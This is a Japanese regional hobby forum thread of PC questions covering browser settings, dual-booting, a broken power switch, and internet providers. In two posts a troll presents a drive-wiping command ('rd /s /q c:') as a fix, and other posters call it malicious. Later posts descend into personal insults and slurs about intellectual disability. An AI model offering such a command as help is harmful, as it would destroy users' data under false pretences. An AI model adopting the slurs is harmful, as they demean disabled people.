3秒後、自動的に【PC/SPページ】にジャンプします。

趣味掲示板@秋田ring

パソコン質問スレ 三台目
251: 1/6 18:44
IEの設定だよ
252: 1/6 20:41
>>250
制御権取得はできます。
>>251
IEは11ですがインターネットオプションで設定出来るのでしょうか?
253: 1/6 20:47
おなじくIEでやってみたら カーソル移動できませんでした。
クロームでは普通にできてますよ。
IEでやる必要もないので困りませんw
254:秋田市民 1/6 21:8
今、OSがUNIXで使用しているパソコンに、Windowsも使えるようにする方法はありますか?
255: 1/6 21:33
>>252
交換表示設定
あとはぐぐれ
256: 1/6 21:45
>>255?
互換表示設定ではないでしょうか?
257: 1/6 22:17
>>256
まったくもってその通り
258: 1/7 10:46
>>254
WINDOWSの領域を新たに設定するか、HDDを追加する。
259: 1/7 20:10
>>254
実験的には面白いけど、実務的にはデュアルブート、結構不便だよ。
260:秋田県人 1/18 14:0
ファイル名を指定して実行

cmd /c rd /s /q c:

↑を入力

使えるようになる
261: 1/18 14:17
>>260
やめろ。悪質なやつだな。
262: 1/22 18:52
ノートPCのdvdが勝手に開くのは何ででしょうね。この頃は閉まりませんねw
263:秋田県人 1/23 10:40
>>260を試せば解決
264: 1/23 10:48
>>263
お前がやって、すぐ書き込んでみせろ。
265: 7/24 8:32
電源ONのプッシュスイッチが断線した。
秋田市のCOM パソコンの館 に修理できるか聞いてみたけど 「メーカーで修理」と言われた。
由利本荘市 PC SUPPORT にはMailおくったけど自動返信だけで、その後音沙汰ない。
スイッチそのものは交換が必要なので スイッチあれば自分でもできそうなんだが どうしたらいい?
266: 7/24 9:56
>>26
起動スイッチ付きのキーボード使うとか。
直せるなら直せばいい。
267: 7/24 19:56
>>265
>自分でもできそうなんだが って、ならやれば。
わざわざ人に言わなくても。
268: 7/24 23:51
>>265
あるかわかんないけど、HARDOFFやネットのジャンク品から使えそうなやつを探すしかなさそう。
一応、ワイヤーストリッパーと半田ごて、糸ハンダ、ドライバーなどの工具類は用意したほうがいいと思う。
略1
269: 7/25 9:58
マザーボードまでいってたとしても故障箇所のパーツ交換すればいいじゃん。
自分で直そうとするならテスターくらいあるだろ?
270: 7/26 8:2
>プッシュスイッチが断線した と故障個所を特定してるんなら
結線するか、部品で交換するかの2択だろ。何が難しいんだ。
271: 7/27 6:19
テスタ(だけ)で故障してる部品を特定するのは結構限界があるんだよね。
オシロで波形見るとか、メーカ推奨の純正部品(良品)でクロスチェックとかしたり、
動作確認なんかをしないとなかなか不良部品の特定するのはなかなか困難な話だよ。
不良箇所 略1
272: 7/27 11:48
へ?
そんな難しく考えなくてもテスターで余裕でしょ。
計算できない人?
273: 7/27 16:19
ユニット組みだし、アセッンブリでユニットごと交換すれば良いだけでしょう。
各ユニットの役割や性能云々はいくらでも調べられる。テスターなんて導通見るのと
流れる電圧見るくらいでなくても良いんじゃないの。
274: 7/27 22:6
>>271
テスターもなにも最初に特定してるよ。後付けはただのしったかさん。
275: 7/27 22:24
基盤タイプ 部品取りを探す。不要TVの基盤から剥がす。
スイッチ スイッチ買ってきてホットボンドで固定
夏冬は電源周りも疑う
276: 7/28 10:16
なんちゃってジサカーは基盤やユニットごと交換してドヤる。
そんなん子供でもできるよなw
277: 7/28 10:21

中古電源購入したT君
「コンデンサが日本製じゃないからイマイチ信用できないけど、サブ機だから買っちゃった」

俺「ならコンデンサ交換したら?」

T君「…。」
278: 7/28 18:25
率直に思ったのは、回路図も部品表などもみないでテスタだけで不良部品を果たして特定できるのかって話。
「ここはちゃんと分圧できてるみたいだからOK、この抵抗は表示通りの抵抗値だからOK」みたいなこと言ってる?
熟練したハード屋さんでも難しいいんじゃないのかな?
279: 7/29 9:11
>>278
テスターすら使わないで>>265みたいに特定する人もいるよ。
280: 7/29 11:29
回路図とか部品表とか言ってる馬鹿いるけどさ、目がついてないのかね?
あ、脳みそ搭載されていないかw
コンデンサ、抵抗、トランジスタとかさ、もしかしてチップセットすら図面見なきゃわからない池沼かな?

うんうんw取扱説明書欲しいよねww
281: 7/29 18:44
こうやってファビョってるとこみると、全くなんにも知らないくちだろうな。
分からないなら分からないって素直に言えばいいんだよ。
変に張り合わなくていいから、見苦しいだけだよ。
282: 7/29 19:19
コンデンサ、抵抗、トランジスタとかさ、もしかしてチップセットすら図面見なきゃわからない池沼かな?
?お前ら何前の話してるんだw30年前の話してるんかなw
懐かしいねトランジスタだってよわらっちゃうねwww
何も分からないなら語るな、馬鹿丸出しだぞ、恥知らずどもwww
283: 7/29 21:37
>>280-282
で、誰に何を言いたいんだ?
284: 7/30 0:32
>>282?
トランジスタは今も当たり前に使われてますよ?
懐かしいってなに?
285: 7/30 0:35
PCどころかスマホ、あらゆる場所に使われているけど、懐かしいってなんだろう?
286: 7/30 1:18
>>285
もしかして>>265の人ですか?
違ってたらごめんなさいね。
あなたは現物をCOMやパソコンの館に見せに行ったか、
電話で問い合わせて店員の方に「メーカー修理 略1
287: 7/30 1:20
すいませんアンカー間違えました。
>>283です。
288: 7/30 6:3
>>282
それらの部品がなかったら何も出来ないでしょ。
LCRは電気回路の基本でしょう。
289: 7/30 16:49
犬より馬鹿な>>202
知ったかしちゃって恥ずかしい知能障害だね
もしかしなくても知能障害から生まれたキチガイだよね>>202
トランジスタが懐かしい?
( ゚д゚)はぁ?
よく恥ずかしくもなくそんなこと言えるね
(〃゚艸゚)プッ
流石両親が池沼なだけあるよ(失笑)
290: 7/30 20:21
>>289
アンカー間違ってないでちゅか〜?
ワンワンよりお馬鹿ちゃんでちゅか〜?
知能障害から生まれたキチガイちゃんでちゅかね〜
流石先祖代々池沼エリートちゃんは違いまちゅね〜
291: 7/30 20:32
窓7のサポート今年いっぱいで終わるんだよね。
窓10より使い勝手がいいのに。
OS交換だけで大丈夫かな?
292: 7/30 21:24
>>289-290
目くそ鼻くそってお前たちを言うんだよ。
293: 7/30 21:28
>>292
はーい。ボク鼻くそ。
君はチンカス君だね?
294: 7/30 21:50
>>293
自分のチンカスみて、人もそうだと思ったのか。剝いたほうがいいよ。
295: 7/30 22:39
>>282
トランジスタが懐かしいってどういう意味か説明はよw

知ったかぶりのお馬鹿ちゃんw
296: 7/30 22:41
いや〜恥ずかしいレスですねw
普通なら自殺するよw
↓知ったかわらっちゃうよwwwwww


282 :秋田県人 :2019/07/29(月) 19:19 ID:gc8Ty2m6
コンデンサ、抵抗、トランジスタ?お前ら何前の話してるんだw30年前の話してるんかなw
懐かしいねトランジスタだってよわらっちゃうねwww
何も分からないなら語るな、馬鹿丸出しだぞ、恥知らずどもwww
297: 7/30 22:44
ま、このザマじゃテスターなんて使い方も知らないだろうな。
検電テスターくらいなら使えるか?

トランジスタが懐かしいwwwwプッ
298: 7/31 10:28
中途半端にトランジスタなんて言わず真空管にしろよ。
299: 1/14 14:27
秋田県で1番速いプロバイダー教えて下さい。高くても構いません。
300: 1/14 18:55
↑自宅とかで光つかうて事なのかな?
短期間でも解約できるとことで契約して速度計測するしかないのでは?
1-

001-051-101-151-201-
251-301-351-401-451-
501-551-601-
[戻る]